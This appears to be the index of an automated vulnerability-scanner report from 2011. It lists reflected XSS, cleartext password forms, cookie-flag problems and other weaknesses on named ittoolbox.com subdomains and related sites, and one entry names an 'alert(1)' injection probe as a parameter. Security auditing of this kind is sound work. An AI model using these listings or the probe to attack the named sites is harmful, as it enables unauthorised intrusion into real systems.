XSS, Cross Site Scripting, ittoolbox.com, CWE-79, CAPEC-86

XSS in ittoolbox.com V-Hosts | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Wed Jan 26 09:06:19 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.2. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.3. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.4. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.5. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.6. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.7. http://cio.ittoolbox.com/events/ [name of an arbitrarily supplied request parameter]

3.8. http://cio.ittoolbox.com/groups/ [name of an arbitrarily supplied request parameter]

3.9. http://cio.ittoolbox.com/research/ [name of an arbitrarily supplied request parameter]

3.10. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.11. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.12. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.13. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.14. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.15. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.16. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.17. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.18. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.19. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.20. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.21. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.22. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.23. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.24. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.25. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.26. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.27. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.28. http://hs.maas360.com/white-paper/ [A parameter]

3.29. http://hs.maas360.com/white-paper/ [O parameter]

3.30. http://hs.maas360.com/white-paper/ [REST URL parameter 1]

3.31. http://hs.maas360.com/white-paper/ [id parameter]

3.32. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]

3.33. http://hs.maas360.com/white-paper/ [utm_campaign parameter]

3.34. http://hs.maas360.com/white-paper/ [utm_medium parameter]

3.35. http://hs.maas360.com/white-paper/ [utm_source parameter]

3.36. http://hs.maas360.com/white-paper/ [utm_term parameter]

3.37. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.38. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.39. http://it.toolbox.com/blogs/ppmtoday [306f2'-alert(1)-'2382eb5920b parameter]

3.40. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]

3.41. http://it.toolbox.com/blogs/ppmtoday/ [name of an arbitrarily supplied request parameter]

3.42. http://it.toolbox.com/blogs/ppmtoday/categories/future+states/2379 [REST URL parameter 4]

3.43. http://it.toolbox.com/blogs/ppmtoday/categories/recommended+reading/1191 [REST URL parameter 4]

3.44. http://it.toolbox.com/blogs/ppmtoday/categories/thinking+out+loud/2765 [REST URL parameter 4]

3.45. http://it.toolbox.com/blogs/ppmtoday/categories/war+stories/1192 [REST URL parameter 4]

3.46. http://it.toolbox.com/blogs/ppmtoday/categories/white+papers/1193 [REST URL parameter 4]

3.47. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674 [REST URL parameter 3]

3.48. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674 [name of an arbitrarily supplied request parameter]

3.49. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 [REST URL parameter 3]

3.50. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 [name of an arbitrarily supplied request parameter]

3.51. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860 [REST URL parameter 3]

3.52. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860 [name of an arbitrarily supplied request parameter]

3.53. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160 [REST URL parameter 3]

3.54. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160 [name of an arbitrarily supplied request parameter]

3.55. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018 [REST URL parameter 3]

3.56. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018 [name of an arbitrarily supplied request parameter]

3.57. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168 [REST URL parameter 3]

3.58. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168 [name of an arbitrarily supplied request parameter]

3.59. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815 [REST URL parameter 3]

3.60. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815 [name of an arbitrarily supplied request parameter]

3.61. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129 [REST URL parameter 3]

3.62. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129 [name of an arbitrarily supplied request parameter]

3.63. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832 [REST URL parameter 3]

3.64. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832 [name of an arbitrarily supplied request parameter]

3.65. http://it.toolbox.com/blogs/ppmtoday/monthly/ [REST URL parameter 3]

3.66. http://it.toolbox.com/blogs/ppmtoday/monthly/ [name of an arbitrarily supplied request parameter]

3.67. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376 [REST URL parameter 3]

3.68. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376 [name of an arbitrarily supplied request parameter]

3.69. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207 [REST URL parameter 3]

3.70. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207 [name of an arbitrarily supplied request parameter]

3.71. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509 [REST URL parameter 3]

3.72. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509 [name of an arbitrarily supplied request parameter]

3.73. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195 [REST URL parameter 3]

3.74. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195 [name of an arbitrarily supplied request parameter]

3.75. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720 [REST URL parameter 3]

3.76. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720 [name of an arbitrarily supplied request parameter]

3.77. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 [REST URL parameter 3]

3.78. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 [name of an arbitrarily supplied request parameter]

3.79. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924 [REST URL parameter 3]

3.80. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924 [name of an arbitrarily supplied request parameter]

3.81. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008 [REST URL parameter 3]

3.82. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008 [name of an arbitrarily supplied request parameter]

3.83. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071 [REST URL parameter 3]

3.84. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071 [name of an arbitrarily supplied request parameter]

3.85. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847 [REST URL parameter 3]

3.86. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847 [name of an arbitrarily supplied request parameter]

3.87. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067 [REST URL parameter 3]

3.88. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067 [name of an arbitrarily supplied request parameter]

3.89. http://it.toolbox.com/communities/ [name of an arbitrarily supplied request parameter]

3.90. http://it.toolbox.com/groups/ [name of an arbitrarily supplied request parameter]

3.91. http://it.toolbox.com/people/ [REST URL parameter 1]

3.92. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]

3.93. http://it.toolbox.com/people/dentrekin/ [REST URL parameter 1]

3.94. http://it.toolbox.com/people/dentrekin/ [name of an arbitrarily supplied request parameter]

3.95. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.96. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.97. http://jlinks.industrybrains.com/jsct [ct parameter]

3.98. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

3.99. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.100. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.101. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.102. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.103. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.104. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.105. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.106. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.107. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.108. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.109. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.110. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.111. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.112. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.113. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.114. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.115. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.116. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.117. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.118. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.119. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.120. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.121. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.122. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.123. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.124. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.125. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.126. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.127. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.128. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.129. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.130. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.131. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

3.132. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]

4. Cleartext submission of password

4.1. http://businessintelligence.ittoolbox.com/

4.2. http://c.ittoolbox.com/

4.3. http://cio.ittoolbox.com/

4.4. http://cio.ittoolbox.com/blogs/

4.5. http://cio.ittoolbox.com/directory/

4.6. http://cio.ittoolbox.com/documents/

4.7. http://cio.ittoolbox.com/events/

4.8. http://cio.ittoolbox.com/groups/

4.9. http://cio.ittoolbox.com/research/

4.10. http://cio.ittoolbox.com/subscriptions/

4.11. http://cloud.ittoolbox.com/

4.12. http://crm.ittoolbox.com/

4.13. http://database.ittoolbox.com/

4.14. http://datacenter.ittoolbox.com/

4.15. http://datawarehouse.ittoolbox.com/

4.16. http://eai.ittoolbox.com/

4.17. http://emergingtech.ittoolbox.com/

4.18. http://erp.ittoolbox.com/

4.19. http://finance.toolbox.com/

4.20. http://hardware.ittoolbox.com/

4.21. http://hr.toolbox.com/

4.22. http://infor.ittoolbox.com/

4.23. http://it.toolbox.com/

4.24. http://it.toolbox.com/ask-a-question

4.25. http://it.toolbox.com/blogs/it-blogs

4.26. http://it.toolbox.com/blogs/ppmtoday

4.27. http://it.toolbox.com/blogs/ppmtoday/

4.28. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674

4.29. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

4.30. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860

4.31. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160

4.32. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018

4.33. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168

4.34. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815

4.35. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129

4.36. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832

4.37. http://it.toolbox.com/blogs/ppmtoday/monthly/

4.38. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376

4.39. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207

4.40. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509

4.41. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195

4.42. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720

4.43. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

4.44. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924

4.45. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008

4.46. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071

4.47. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847

4.48. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067

4.49. http://it.toolbox.com/blogs/start

4.50. http://it.toolbox.com/communities/

4.51. http://it.toolbox.com/companies/

4.52. http://it.toolbox.com/companies/white-papers/

4.53. http://it.toolbox.com/groups/

4.54. http://it.toolbox.com/home/recover-password

4.55. http://it.toolbox.com/home/register

4.56. http://it.toolbox.com/home/search/

4.57. http://it.toolbox.com/home/signin

4.58. http://it.toolbox.com/jobs/

4.59. http://it.toolbox.com/people/

4.60. http://it.toolbox.com/people/dentrekin/

4.61. http://it.toolbox.com/topics/

4.62. http://java.ittoolbox.com/

4.63. http://knowledgemanagement.ittoolbox.com/

4.64. http://linux.ittoolbox.com/

4.65. http://networking.ittoolbox.com/

4.66. http://oracle.ittoolbox.com/

4.67. http://peoplesoft.ittoolbox.com/

4.68. http://projectmanagement.ittoolbox.com/

4.69. http://sap.ittoolbox.com/

4.70. http://security.ittoolbox.com/

4.71. http://siebel.ittoolbox.com/

4.72. http://storage.ittoolbox.com/

4.73. http://supplychain.ittoolbox.com/

4.74. http://telephony.ittoolbox.com/

4.75. http://unix.ittoolbox.com/

4.76. http://visualbasic.ittoolbox.com/

4.77. http://webdesign.ittoolbox.com/

4.78. http://windows.ittoolbox.com/

4.79. http://wireless.ittoolbox.com/

4.80. http://www.ebizq.net/blogs/saasweek/

4.81. http://www.toolbox.com/

4.82. http://www.toolbox.com/Feedback.aspx

4.83. http://www.toolbox.com/PrivacyPolicy.aspx

4.84. http://www.toolbox.com/TermsofUse.aspx

4.85. http://www.toolbox.com/about/

4.86. http://www.toolbox.com/careers/

4.87. http://www.toolbox.com/contact/

4.88. http://www.toolbox.com/it/advertising/

4.89. http://www.toolbox.com/news/

5. Session token in URL

6. Cookie without HttpOnly flag set

6.1. http://hs.maas360.com/white-paper/

6.2. http://twitter.com/toolboxdotcom

6.3. http://twitter.com/toolboxforit

6.4. http://www.indeed.com/ads/apiresults.js

6.5. http://cio.ittoolbox.com/directory/

6.6. http://cspix.media6degrees.com/orbserv/hbpix

6.7. http://ds.addthis.com/red/psi/sites/it.toolbox.com/p.json

6.8. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674

6.9. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

6.10. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860

6.11. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160

6.12. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018

6.13. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168

6.14. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815

6.15. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129

6.16. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832

6.17. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376

6.18. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207

6.19. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509

6.20. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195

6.21. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720

6.22. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

6.23. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924

6.24. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008

6.25. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071

6.26. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847

6.27. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067

6.28. http://it.toolbox.com/home/register

6.29. http://it.toolbox.com/jobs/

6.30. http://it.toolbox.com/trd/885101

6.31. http://links.industrybrains.com/click

6.32. http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520

6.33. http://oasc05134.247realmedia.com/RealMedia/ads/adstream_jx.ads/TLBXittoolbox/technology/1%7BTIME_DATE_STAMP%7D@Top1

6.34. http://www.facebook.com/pages/Toolboxcom/117012708708

6.35. http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html

6.36. http://www.omniture.com/

6.37. http://www.pbs.org/cringely/pulpit/

6.38. http://www.spiceworks.com/features/

7. Password field with autocomplete enabled

7.1. http://businessintelligence.ittoolbox.com/

7.2. http://c.ittoolbox.com/

7.3. http://cio.ittoolbox.com/

7.4. http://cio.ittoolbox.com/blogs/

7.5. http://cio.ittoolbox.com/directory/

7.6. http://cio.ittoolbox.com/documents/

7.7. http://cio.ittoolbox.com/events/

7.8. http://cio.ittoolbox.com/groups/

7.9. http://cio.ittoolbox.com/research/

7.10. http://cio.ittoolbox.com/subscriptions/

7.11. http://cloud.ittoolbox.com/

7.12. http://crm.ittoolbox.com/

7.13. http://database.ittoolbox.com/

7.14. http://datacenter.ittoolbox.com/

7.15. http://datawarehouse.ittoolbox.com/

7.16. http://eai.ittoolbox.com/

7.17. http://emergingtech.ittoolbox.com/

7.18. http://erp.ittoolbox.com/

7.19. http://finance.toolbox.com/

7.20. http://hardware.ittoolbox.com/

7.21. http://hr.toolbox.com/

7.22. http://infor.ittoolbox.com/

7.23. http://it.toolbox.com/

7.24. http://it.toolbox.com/ask-a-question

7.25. http://it.toolbox.com/blogs/it-blogs

7.26. http://it.toolbox.com/blogs/ppmtoday

7.27. http://it.toolbox.com/blogs/ppmtoday

7.28. http://it.toolbox.com/blogs/ppmtoday/

7.29. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674

7.30. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

7.31. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860

7.32. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160

7.33. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018

7.34. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168

7.35. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815

7.36. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129

7.37. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832

7.38. http://it.toolbox.com/blogs/ppmtoday/monthly/

7.39. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376

7.40. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207

7.41. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509

7.42. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195

7.43. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720

7.44. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

7.45. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924

7.46. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008

7.47. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071

7.48. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847

7.49. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067

7.50. http://it.toolbox.com/blogs/start

7.51. http://it.toolbox.com/communities/

7.52. http://it.toolbox.com/companies/

7.53. http://it.toolbox.com/companies/white-papers/

7.54. http://it.toolbox.com/groups/

7.55. http://it.toolbox.com/home/recover-password

7.56. http://it.toolbox.com/home/register

7.57. http://it.toolbox.com/home/register

7.58. http://it.toolbox.com/home/register

7.59. http://it.toolbox.com/home/register

7.60. http://it.toolbox.com/home/search/

7.61. http://it.toolbox.com/home/signin

7.62. http://it.toolbox.com/jobs/

7.63. http://it.toolbox.com/people/

7.64. http://it.toolbox.com/people/dentrekin/

7.65. http://it.toolbox.com/topics/

7.66. http://java.ittoolbox.com/

7.67. http://knowledgemanagement.ittoolbox.com/

7.68. http://linux.ittoolbox.com/

7.69. http://networking.ittoolbox.com/

7.70. http://oracle.ittoolbox.com/

7.71. http://peoplesoft.ittoolbox.com/

7.72. http://projectmanagement.ittoolbox.com/

7.73. http://sap.ittoolbox.com/

7.74. http://security.ittoolbox.com/

7.75. http://siebel.ittoolbox.com/

7.76. http://storage.ittoolbox.com/

7.77. http://supplychain.ittoolbox.com/

7.78. http://telephony.ittoolbox.com/

7.79. http://twitter.com/toolboxdotcom

7.80. http://twitter.com/toolboxforit

7.81. http://unix.ittoolbox.com/

7.82. http://visualbasic.ittoolbox.com/

7.83. http://webdesign.ittoolbox.com/

7.84. http://windows.ittoolbox.com/

7.85. http://wireless.ittoolbox.com/

7.86. http://www.ebizq.net/blogs/saasweek/

7.87. http://www.facebook.com/pages/Toolboxcom/117012708708

7.88. http://www.toolbox.com/

7.89. http://www.toolbox.com/Feedback.aspx

7.90. http://www.toolbox.com/PrivacyPolicy.aspx

7.91. http://www.toolbox.com/TermsofUse.aspx

7.92. http://www.toolbox.com/about/

7.93. http://www.toolbox.com/careers/

7.94. http://www.toolbox.com/contact/

7.95. http://www.toolbox.com/it/advertising/

7.96. http://www.toolbox.com/news/

8. Cross-domain POST

9. Cookie scoped to parent domain

9.1. http://cio.ittoolbox.com/directory/

9.2. http://cspix.media6degrees.com/orbserv/hbpix

9.3. http://ds.addthis.com/red/psi/sites/it.toolbox.com/p.json

9.4. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674

9.5. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

9.6. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860

9.7. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160

9.8. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018

9.9. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168

9.10. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815

9.11. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129

9.12. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832

9.13. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376

9.14. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207

9.15. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509

9.16. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195

9.17. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720

9.18. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

9.19. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924

9.20. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008

9.21. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071

9.22. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847

9.23. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067

9.24. http://it.toolbox.com/home/register

9.25. http://it.toolbox.com/jobs/

9.26. http://it.toolbox.com/trd/885101

9.27. http://links.industrybrains.com/click

9.28. http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520

9.29. http://www.facebook.com/pages/Toolboxcom/117012708708

9.30. http://www.indeed.com/ads/apiresults.js

9.31. http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html

9.32. http://www.pbs.org/cringely/pulpit/

9.33. http://www.spiceworks.com/features/

10. Cross-domain Referer leakage

10.1. http://hs.maas360.com/white-paper/

10.2. http://it.toolbox.com/blogs/ppmtoday

10.3. http://it.toolbox.com/blogs/ppmtoday

10.4. http://it.toolbox.com/blogs/ppmtoday

10.5. http://it.toolbox.com/home/register

10.6. http://it.toolbox.com/wiki/index.php/CommunityTopic

10.7. http://oasc05134.247realmedia.com/RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1023555694/Top1/BBN/Default_Toolbox_Universal_Multi/iPhone_728x90.png/7263485738303033424c73414270536c

10.8. http://oasc05134.247realmedia.com/RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1306774515/Top1/BBN/Default_Toolbox_Universal_Multi/ask_a_question_728x90.png/7263485738303033424c73414270536c

10.9. http://oasc05134.247realmedia.com/RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1311919668/Top1/BBN/Default_Toolbox_Universal_Multi/iPhone_728x90.png/7263485738303033424c73414270536c

10.10. http://oasc05134.247realmedia.com/RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/627413912/Top1/BBN/Default_Toolbox_Universal_Multi/ask_a_question_728x90.png/7263485738303033424c73414270536c

10.11. http://oasc05134.247realmedia.com/RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/664329713/Top1/BBN/Default_Toolbox_Universal_Multi/whitepaper_ldrbrd_ad.jpg/7263485738303033424c73414270536c

10.12. http://www.manageengine.com/products/desktop-central/index.html

10.13. http://www.manageengine.com/products/service-desk/index.html

10.14. http://www.sophos.com/lp/compliancefordummies/

10.15. http://www.spiceworks.com/features/

11. Cross-domain script include

11.1. http://businessintelligence.ittoolbox.com/

11.2. http://c.ittoolbox.com/

11.3. http://cio.ittoolbox.com/

11.4. http://cio.ittoolbox.com/blogs/

11.5. http://cio.ittoolbox.com/directory/

11.6. http://cio.ittoolbox.com/documents/

11.7. http://cio.ittoolbox.com/events/

11.8. http://cio.ittoolbox.com/groups/

11.9. http://cio.ittoolbox.com/research/

11.10. http://cio.ittoolbox.com/subscriptions/

11.11. http://cloud.ittoolbox.com/

11.12. http://crm.ittoolbox.com/

11.13. http://database.ittoolbox.com/

11.14. http://datacenter.ittoolbox.com/

11.15. http://datawarehouse.ittoolbox.com/

11.16. http://eai.ittoolbox.com/

11.17. http://emergingtech.ittoolbox.com/

11.18. http://erp.ittoolbox.com/

11.19. http://finance.toolbox.com/

11.20. http://hardware.ittoolbox.com/

11.21. http://hr.toolbox.com/

11.22. http://infor.ittoolbox.com/

11.23. http://it.toolbox.com/

11.24. http://it.toolbox.com/api/ads/4/10/17/companyprofile/0/0/1665161017/0

11.25. http://it.toolbox.com/api/ads/4/10/25/companyprofile/0/0/1598021324/0

11.26. http://it.toolbox.com/ask-a-question

11.27. http://it.toolbox.com/blogs/it-blogs

11.28. http://it.toolbox.com/blogs/ppmtoday

11.29. http://it.toolbox.com/blogs/ppmtoday

11.30. http://it.toolbox.com/blogs/ppmtoday

11.31. http://it.toolbox.com/blogs/ppmtoday

11.32. http://it.toolbox.com/blogs/ppmtoday

11.33. http://it.toolbox.com/blogs/ppmtoday

11.34. http://it.toolbox.com/blogs/ppmtoday/

11.35. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674

11.36. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

11.37. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860

11.38. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160

11.39. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018

